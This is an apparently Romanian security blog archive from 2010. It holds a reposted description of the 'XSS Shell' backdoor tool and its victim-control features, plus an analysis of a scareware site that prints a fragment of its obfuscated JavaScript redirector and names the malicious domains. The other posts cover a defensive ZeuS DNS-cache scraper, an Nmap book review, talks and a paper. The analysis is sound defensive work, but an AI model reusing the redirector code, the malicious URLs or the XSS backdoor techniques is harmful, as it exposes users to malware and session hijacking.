XSS Shell Demo

Posted May 4th, 2010. Filed under DotCom

Tocmai m-am uitat prin RSS reader si am dat peste ceva interesant postat pe SecurityTube.Net :

XSS Shell is powerful a XSS backdoor and zombie manager. This concept first presented by XSS-Proxy. Normally in XSS attacks attacker has one shot, in XSS Shell you can interactively send requests and get responses from victim. you can backdoor the page.

You can steal basic authentication, you can bypass IP restrictions in administration panels, you can DDoS some systems with a permanent XSS vulnerability etc. Attack possibilities are limited with ideas. Basically this tool demonstrates that you can do more with XSS.

XSS Shell has several features to gain whole access over victim. Also you can simply add your own commands. Most of the features can enable or disabled from configuration or can be tweaked from source code. The main feature in XSS Shell is ‘Page Regeneration’. XSS Shell re-renders the infected page and keep user in virtual environment. Thus even user click any links in the infected page he or she will be still under control! (within cross-domain restrictions) In normal XSS attacks when user leaves the page you can’t do anything. Secondly this feature keeps the session open so even victim follow an outside link from infected page session is not going to timeout and you will be still in charge.

In this video, killer3027 shows us a demo of the Xss Shell. Thanks go out to zitstif for referring this video to us!

Video : http://securitytube.net/XSS-Shell-Demo-video.aspx

Ok , partea interesanta este urmatoarea : killer-tr este un amic de al meu de pe warezforum.info .
Ghiciti voi cine este Kabron din video respectiv .

Book of the Month: NMAP COOKBOOK

Posted April 19th, 2010. Filed under DotCom

“NMAP COOKBOOK – The fat-free guide to network scanning” is the latest book on the world’s best network scanning tool, NMAP. It is the most popular tool with pathora of options which works on wide range of platforms including Windows & Linux.

NMAP is the most popular tool out there with so many options to fine tune the network scanning based on one’s needs. Often new comer and even experienced professionals find it difficult to use full features of NMAP when it comes to field work. In this direction, ‘NMAP Cookbook’ does a great job in conveying rich features of this great tool with its simplified and concise illustration.

book

In a nutshell, following topics have been covered,

* Installation on Windows, Mac OS X, Unix/Linux platforms
* Basic and advanced scanning techniques
* Network inventory and security auditing
* Firewall evasion techniques
* Zenmap – A graphical front-end for Nmap
* NSE – The Nmap Scripting Engine
* Ndiff – A Nmap scan comparison utility

In addition to explaining basic scanning techniques, it goes on describing other related stuffs such as firewall evasion methods, scripting engine of NMAP, using graphical version of NMAP tool etc. These things together make it great reference book for any security professional.

The book is written based on latest version of the tool, NMAP 5.0. All the scanning options are shown along with visual illustrations which helps in quick grasping of practical examples.

Overall, it stands out from other NMAP based books due to its simplistic and concise explanation which makes it very fast and easy to master the intrinsic technicalities of NMAP.

Source :http://nagareshwar.securityxploded.com/2010/04/19/book-of-the-month-nmap-cookbook/

P.S Daca a gasit cineva .pdf vreau si eu un link.

Finding Malware on your network via cached DNS entries

Posted April 19th, 2010. Filed under DotCom

PDATE: There’s a new version, with 25% less bugs! Use this instead.

As some of you may know, I wear an Incident Response hat within my organization. As I like to be proactive and actively search for issues rather then just be an IDS alert monkey, I love pages like the Malware Domain List, the ZeuS Tracker, and malwareurl.com. While these are great resources, it is a bit difficult attempting to take the lists and apply them to the environment; most of their usefulness comes from when you have a questionable URL and need to see if someone else has reported it as a bad site. A great service, but not proactive.

While staring at the ZeuS Tracker Domain Block list and trying my usual method of snipe hunting manually entering domains to query the firewalls, a moment of inspiration hit: I don’t care about all the domains, just the domains that people visit. Who knows what domains people visit? The DNS servers! Now it was just a question of trying to coax the information out of the DNS servers. Thankfully, PaulDotCom Security Weekly came to the rescue: They have been talking about getting information out of DNS servers during penetration tests and a simple non-recursive DNS lookup on the local DNS server can tell you if someone queried for the host recently. A couple of quick experiments to verify this fact on my work’s main DNS servers confirmed this fact, and I set to work.

My first attempt was a simple script to take a pre-chewed version of the ZeuS Domain list, feed it through dig and pipe the output through grep. It worked, but I wanted something a touch more automated. Over the next couple of nights on the train, I whipped up a tool to automate the process a little more. The resulting tool is the ZeuS DNS Scraper. It’s a simple script written in Perl and should work straight out of the box with the default modules included in a Perl distribution.
Running the Script

Running the tool is fairly simple, there are only 4 options: –server, specifying which server(s) to query, –file, specifying where to put the downloaded ZeuS Tracker block list (defaulting to /tmp/ztbl.txt) , –download/–nodownload which specifies whether or not the script should attempt to download the block list, and –debug, which specifies the verbosity of the script.

A typical command line would be:

perl zeusdnsscraper.pl –server 192.168.1.2 –server 192.168.1.3

Which would download the block list, and then proceed to query 192.168.1.2 and 192.168.1.3 for each entry in the block list. You can specify as many as many servers as you like, however, the block list often hovers around a thousand entries, so each additional server adds another thousand or so queries.

Alternatively, once the list is downloaded, the script will download the block list only if the local copy is older then 60 minutes, (don’t worry it doesn’t update that frequently). You can also specify that the script doesn’t download the list again with the –nodownload option:

perl zeusdnsscraper.pl –server 192.168.1.2 –server 192.168.1.3 –nodownload

You can also turn on debugging with the debug option, which will display every step in the process:

perl zeusdnsscraper.pl –server 192.168.1.2 –server 192.168.1.3 –debug

Interpreting Results

When the script is run in default mode, a ‘.’ will appear after each query, while in debug mode it will display the result of the query and whether or not it found an entry.
What You Want To See

Completed!
NNNN queries made, 0 entries found! Hooray!

In this example, NNNN would be the number of queries sent, remember this increases which each additional server you need to query, and it has found 0 entries, indicating that the DNS servers queried have no cached entries for any of the domains. Congratulations, pat yourself on the back and grab yourself a nice frosty beverage from the refrigerator.
What You Do Not Want To See

NNNN queries made, 4 entries found. Uh Oh.
W.X.Y.Z has an entry in it’s cache for www.example.net: 10.1.2.3
W.X.Y.Z has an entry in it’s cache for www.example.net: 10.1.2.4
W.X.Y.Z has an entry in it’s cache for www.example.com: 10.4.5.6
W.X.Y.Z has an entry in it’s cache for www.example.org: 10.7.8.9

Well, crap. This time the beverage you need is probably kept in your attrition.org flask. NNNN is the number of queries the script made and the “4″ in this example is number of results found. In this example, “www.example.net” was cached with two separate addresses, while “www.example.com” and “www.example.org” both have one apiece. The W.X.Y.Z in the above example is the DNS server that responded, and the 10.X.X.X addresses are the IP addresses that the DNS server responded with. These IP addresses are what you are interested in.
My DNS Servers Have Cached Entries! Now What?

This is where some good old detective work comes in. The presence of the cached entries on your DNS server only means that one of the clients on your network asked for the entry in question. Normally, it’s time to start plugging IP addresses in your firewall logs to see who’s been visiting them. Then it’s time to start cleaning.
Caveats

Now, obviously, this sends a boat load of queries in a very rapid fashion to DNS servers. Make sure that your DNS server and your connection can handle the load and don’t run it against DNS servers that you do not have permission to do so. Also, some of the DNS entries have small enough TTLs that they may expire quickly, meaning that even if the script comes back clean, there could still be infected hosts.
Thanks

I’d just like to say a big thanks to the folks over at abuse.ch for hosting the ZeuS Tracker. It’s a handy tool and it’s invaluable if you’re running even a moderately sized network.

Source and more info here : http://www.innismir.net/article/467

The Virus Underground (24c3)

Posted April 9th, 2010. Filed under DotCom

This is the video of the presentation titled “The Virus Underground” given by SkyOut at 24c3.

The listeners will be introduced in the world of virus coding. They will understand how this can be seen as a way of expressing yourself and why it is a way of hacking. Furthermore they will get to know, which important groups, authors and viruses have been there in the last years and which are still active nowadays. Important technical terms will be explained as well as trends of the last years and the future. And more.

Source : Securitytube.net

CleanUp Antivirus(Lolz) and Discovery.com

Posted April 5th, 2010. Filed under DotCom

Ok , cautam aiurea pe internet ,dupa ce habar nu am click click si iara click pana am ajuns aici : http://potolami.freei.me/ ( nu intrati pe el daca rulati windows si nu aveti javascript off).
Sursa paginii : Sursa.txt

Sursa este mult mai mare dar in continuare contine doar tampenii ,gen :

Discovery.com survivor skills, but the way, like california innovations, could kill an complex &quot if the day argues to eliminate harm territories from rare people, using it harder to erect the video routines.
Petroleum will buy its relationships and mean down its affected threats, discovery.com survivor skills.
Discovery.com survivor skills, i think both your interests for further plenty.

Discovery.com survivor skills, this gene was along seen as many seeds swung purple aztec forces in the  intrusive sport.
For himself, you might reduce a independence by following a coloration over the stage, discovery.com survivor skills.
Discovery.com survivor skills, all categories have scientists and often all will bring in helium.

Discovery.com survivor skills, a interested moisture is the game contributing laptop, perhaps fought in the addiction bake.
Discovery.com survivor skills, this embellished over 700,000 fantasia.
Sometimes, that spoke our heat for feature, discovery.com survivor skills.

Fireste ca mi-a sarit in ochi acel javascript,source:

qy=11;
joyd=top;
l=””;
u=new Array();
sd=new Date();
u[4]=’k.fu’;
u[7]=’t.ne’;
u[6]=’ta’;
bp=”referrer”;
u[1]=’tp’;
u[3]=’ppq’;
sp=qy-10;
u[0]=’ht’;
gx=”location”;
u[8]=’t/’
u[5]=’lls’;
xjq=joyd.document;
u[2]=’://’;
for (var g=0;g

Nu sunt eu expertul lui peste dar sunt foarte comvins ca ceva nu este bine aici ! ( cei ce sunt mai familiarizati cu javascript pot comenta).

Ok,unde ajungem cu toate astea , raspunsul e foarte simplu : dupa accesarea paginii ajungi aici :http://zdustsave19.xorg.pl.Cateva link-uri exacte:

Link 1 : click
Link 2 : click

Asa acum am ajuns pe pagina unde este toata mierea.Aici suntem avertizati ca suntem infectati cu tot felul de virusi , sistemul nostru de operare este windows vista ( lol ,asta e tare ! ) si ca trebuie neaparat sa downloadam asta : http://www.virustotal.com/analisis/5b6d4de537d0113acd2ead6b43b8aa3a3e285f9a06db5fc9cb298ba428616341-1270446095.
Am downloadat fisierul pe al meu ubuntu dupa care a fost instalat pe un windows xp sp2 in virtualbox .
Ce am obtinut :
http://i44.tinypic.com/9ssdqu.png ( fig1)
http://i41.tinypic.com/b7i0ef.png (fig2)

In figura 2 se pot observa si cateva ip-uri , daca sunteti curiosi si cautati cate ceva o sa dai peste asta :http://www.malwareurl.com/listing.php?domain=94.102.63.64

Si uite asa ajungem la o singura concluzie : FOLOSITI NOSCRIPT

Automated seo poisoning attacks

Posted March 31st, 2010. Filed under DotCom

This paper describes recent research by SophosLabs into how attackers are using blackhat Search Engine Optimisation (SEO) techniques to stuff legitimate websites with content designed to rank highly in search engine results, yet redirect users to malicious sites. These websites are being used to distribute rogue security products (also known as “scareware” or “fake
antivirus”)onto users’ computers.
Sophos researchers have analysed the malicious SEO kits used by hackers to create networks of thousands of crosslinked pages containing searchfriendly content on hottrending topics, hosted on compromised, legitimate websites.

Downoad : PDF

Source : http://security-sh3ll.blogspot.com

Powered by HaxTor | CopyWrong © 2011